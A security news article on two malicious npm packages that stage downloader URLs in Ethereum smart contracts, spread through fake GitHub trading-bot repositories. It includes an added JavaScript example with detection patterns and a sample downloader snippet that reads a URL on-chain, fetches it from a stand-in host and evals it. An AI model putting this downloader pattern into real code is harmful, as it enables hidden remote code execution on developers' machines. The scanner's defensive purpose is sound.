
Malicious npm Packages Exploit Ethereum Smart Contracts to Target Cryptocurrency Developers

September 03, 2025 | Ravie Lakshmanan | Malware / Social Engineering

Cybersecurity researchers have discovered two new malicious packages on the npm registry that use Ethereum blockchain smart contracts to deliver malware to compromised systems, once again signaling that threat actors keep looking for new ways to distribute malware while flying under the radar.

"The two npm packages abused smart contracts to hide malicious commands that installed downloader malware on compromised systems," ReversingLabs researcher Lucija Valentić said in a report shared with The Hacker News.


The packages, both uploaded to npm in July 2025 and no longer available for download, are listed below –

The software supply chain security company said the libraries were part of a larger and sophisticated campaign spanning npm and GitHub that enticed unsuspecting developers into downloading and executing them.

While the packages themselves make no effort to hide their malicious functionality, ReversingLabs noted that the GitHub projects importing these packages went to considerable lengths to make themselves look credible.

As for the packages themselves, the malicious behavior is triggered once either of them is used or included in another project, at which point it retrieves and executes a next-stage payload from an attacker-controlled server.

While this is par for the course for malware downloaders, where it differs is in the use of Ethereum smart contracts to stage the URLs hosting the payload, a technique reminiscent of EtherHiding. Because the URL is read from on-chain contract storage rather than hard-coded in the package, a static indicator such as a C2 domain is absent from the published code, and the operator can rotate the payload location without republishing anything. The shift highlights the new tactics threat actors are adopting to evade detection.
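The following is an added example, not code from ReversingLabs or from the packages described on this page. It shows the two halves of the technique from a defender's point of view: first, how a downloader turns the raw hex returned by an Ethereum `eth_call` into a URL (a contract view function returning a Solidity `string` is ABI-encoded as offset word, length word, then padded bytes), and second, a heuristic scanner that flags package source combining an on-chain read with execution of fetched content. The contract, URL, and sample sources are constructed for illustration; the regular expressions are an assumption about what such code typically looks like, not a signature for the real packages.

```javascript
// Added example: ABI decoding of an eth_call string result plus a heuristic
// scanner for npm sources that read a URL from a contract and execute what it serves.

// Return the i-th 32-byte word of an ABI-encoded buffer as a BigInt.
function word(buf, i) {
  return BigInt('0x' + buf.subarray(i * 32, (i + 1) * 32).toString('hex'));
}

// Decode a single ABI-encoded `string` return value (Solidity view function).
// Layout: word 0 = byte offset of the string head, word at that offset = length,
// followed by the UTF-8 bytes right-padded to a 32-byte boundary.
function abiDecodeString(hexResult) {
  const hex = hexResult.startsWith('0x') ? hexResult.slice(2) : hexResult;
  const buf = Buffer.from(hex, 'hex');
  if (buf.length < 64 || buf.length % 32 !== 0) throw new Error('not an ABI string result');
  const offset = Number(word(buf, 0));
  if (offset % 32 !== 0 || offset + 32 > buf.length) throw new Error('bad offset word');
  const length = Number(word(buf, offset / 32));
  if (offset + 32 + length > buf.length) throw new Error('declared length exceeds payload');
  return buf.subarray(offset + 32, offset + 32 + length).toString('utf8');
}

// Encode a string the same way, so the sample below can be checked against a hand-built hex.
function abiEncodeString(s) {
  const data = Buffer.from(s, 'utf8');
  const out = Buffer.alloc(64 + Math.ceil(data.length / 32) * 32);
  out.writeUInt32BE(32, 28);          // low bytes of word 0: offset = 0x20
  out.writeUInt32BE(data.length, 60); // low bytes of word 1: length
  data.copy(out, 64);
  return '0x' + out.toString('hex');
}

// Constructed sample: what eth_call returns for a view function returning
// "https://example.invalid/stage2" (30 bytes, so 0x1e, padded with two zero bytes).
const SAMPLE_ETH_CALL_RESULT = '0x'
  + '0000000000000000000000000000000000000000000000000000000000000020'
  + '000000000000000000000000000000000000000000000000000000000000001e'
  + '68747470733a2f2f6578616d706c652e696e76616c69642f7374616765320000';

// Heuristic indicators (assumptions, not signatures from the report):
// an on-chain read ...
const RPC_READ = [/eth_call/, /JsonRpcProvider|Web3Provider/, /new\s+Web3\s*\(/];
// ... combined with execution of data the package did not ship with.
const REMOTE_EXEC = [/\beval\s*\(/, /new\s+Function\s*\(/, /child_process/, /vm\.runIn\w+Context/];

// Flag source text that both reads from a chain and executes fetched content.
function scanPackageSource(src) {
  const rpc = RPC_READ.filter((r) => r.test(src)).map(String);
  const exec = REMOTE_EXEC.filter((r) => r.test(src)).map(String);
  return { suspicious: rpc.length > 0 && exec.length > 0, rpc, exec };
}

// Constructed sample sources. The first reads a balance and prints it; the second is
// the downloader shape: eth_call -> decode URL -> fetch -> eval.
const BENIGN_SOURCE = `
const provider = new ethers.JsonRpcProvider(RPC_URL);
const balance = await provider.getBalance(address);
console.log(balance.toString());
`;

const DOWNLOADER_SOURCE = `
const res = await fetch(RPC_URL, { method: 'POST', body: JSON.stringify({
  jsonrpc: '2.0', id: 1, method: 'eth_call',
  params: [{ to: CONTRACT, data: SELECTOR }, 'latest'] }) });
const url = abiDecodeString((await res.json()).result);
const stage2 = await (await fetch(url)).text();
eval(stage2);
`;

console.log('decoded URL:', abiDecodeString(SAMPLE_ETH_CALL_RESULT));
console.log('benign:', scanPackageSource(BENIGN_SOURCE));
console.log('downloader:', scanPackageSource(DOWNLOADER_SOURCE));
```

The scanner is deliberately narrow: reading from a contract is normal in a trading bot, and `eval` alone appears in plenty of legitimate code, so only the conjunction is reported. In practice the same heuristic belongs in a pre-install hook or a CI step that scans `node_modules` after `npm install`, and a hit should be followed by reading the package by hand rather than trusting the regex.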

A closer look at the packages revealed that they are referenced by a network of GitHub repositories claiming to be a solana-trading-bot-v2 that uses "real-time chain data to automatically execute transactions, saving you time and effort." The GitHub account associated with the repository is no longer available.


These accounts are assessed to be part of a distribution-as-a-service (DaaS) offering called the Stargazers Ghost Network, a group of fake GitHub accounts known to star, fork, watch, commit to, and subscribe to malicious repositories in order to artificially inflate their popularity.

Among these commits are source code changes that import colortoolsv2. Some of the other repositories caught pushing the npm package are ethereum-mev-v2, arbitrage-bot, and hyperliquid-trading-bot.

The names of these GitHub repositories suggest that developers and cryptocurrency users are the campaign's primary targets, reached through a combination of social engineering and deception.

"It's essential for developers to evaluate each library they plan to implement before deciding to include it in their development cycle," Valentić said. "And that means lifting the covers on open source packages and their maintainers: looking beyond the raw numbers of maintainers, commits, and downloads to assess whether a given package – and the developers behind it – are what they present themselves as."
